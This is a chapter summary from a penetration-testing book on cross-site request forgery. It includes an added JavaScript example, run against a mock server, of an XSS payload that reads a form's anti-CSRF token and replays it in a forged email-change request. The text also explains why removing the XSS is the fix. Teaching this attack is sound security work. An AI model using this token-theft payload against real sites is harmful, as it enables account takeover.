In this chapter, you learned about CSRF and how it abuses the trust a web application places in the user's browser: the browser attaches the victim's session cookies to any request it sends, including one forged by a page the attacker controls. You saw how to detect applications that may be vulnerable, reviewed an exploitation procedure, and practiced with an example, analyzing how it would work in web services. You also learned how an XSS vulnerability in the target application defeats anti-CSRF tokens: because the injected script runs inside the application's own origin, it can read the token from the page and submit the forged request itself, so neither the token nor the same-origin policy (with CORS) stops the attack.
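The token bypass mentioned above, as an added example that is not part of the book's material: it models the two requests an XSS payload makes from inside the vulnerable origin, first reading the hidden anti-CSRF field from the form, then replaying it in a forged POST. The application, its `/account/email` form, the `csrf_token` field name and the sample HTML are all hypothetical, and `fetch` is injected so the flow runs offline against a constructed mock of the server.

```javascript
// Added example (not from the book). Hypothetical target: a profile form at
// /account/email protected by a hidden input named "csrf_token". The URL, field
// names and sample markup below are constructed for illustration only.

// Pull the anti-CSRF token out of the form HTML. An in-browser payload would
// read it from the DOM; a regex over the raw markup keeps this runnable in Node.
function extractCsrfToken(html, fieldName = "csrf_token") {
  const re = new RegExp(
    `<input[^>]*name=["']${fieldName}["'][^>]*value=["']([^"']+)["']`, "i");
  const m = re.exec(html);
  return m ? m[1] : null;
}

// Build the urlencoded body the payload will POST, with the stolen token appended.
function buildForgedBody(token, fields) {
  return new URLSearchParams({ ...fields, csrf_token: token }).toString();
}

// The attack: both requests originate from the application's own origin, so the
// browser attaches the victim's session cookie and the same-origin policy does
// not prevent the script from reading the first response. `fetchImpl` is
// injected so the same flow can run against the mock below.
async function stealTokenAndForge(fetchImpl, formUrl, actionUrl, fields) {
  const page = await fetchImpl(formUrl, { credentials: "same-origin" });
  const token = extractCsrfToken(await page.text());
  if (!token) throw new Error("anti-CSRF token not found in form");
  const body = buildForgedBody(token, fields);
  const res = await fetchImpl(actionUrl, {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body,
  });
  return { token, body, status: res.status };
}

// Constructed stand-in for the vulnerable application (not a real server).
const SAMPLE_FORM_HTML = `
<form method="POST" action="/account/email">
  <input type="hidden" name="csrf_token" value="a1b2c3d4e5f6">
  <input type="email" name="email">
  <button>Save</button>
</form>`;

// Mock fetch: serves the form on GET and, like a real token check, accepts the
// POST only when the submitted csrf_token matches the one it issued.
function mockFetch(url, opts = {}) {
  const method = opts.method || "GET";
  if (url === "/account/email" && method === "GET") {
    return Promise.resolve({ status: 200, text: async () => SAMPLE_FORM_HTML });
  }
  if (url === "/account/email" && method === "POST") {
    const ok = new URLSearchParams(opts.body).get("csrf_token") === "a1b2c3d4e5f6";
    return Promise.resolve({ status: ok ? 200 : 403, text: async () => "" });
  }
  return Promise.resolve({ status: 404, text: async () => "" });
}

// Usage: run the attack against the mock and print the forged request details.
stealTokenAndForge(mockFetch, "/account/email", "/account/email",
  { email: "attacker@example.com" }).then(r => console.log(r));
```

The point to take from this is that a per-session or per-request token only defends against requests made from another origin; once script executes inside the application, the token is just another value the script can read, and SameSite cookie settings do not help either because the forged request is same-site. The fix for this bypass is removing the XSS, not strengthening the token.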
As in previous chapters, the last section of this one was about defense. We reviewed the recommended methods for preventing or mitigating CSRF vulnerabilities, whether in your own applications or in those of your clients.
The next chapter is a brief introduction to cryptography, focusing on the basics a penetration tester needs to know: distinguishing between encryption, hashing, and encoding; identifying weak cryptographic implementations; and exploiting common vulnerabilities.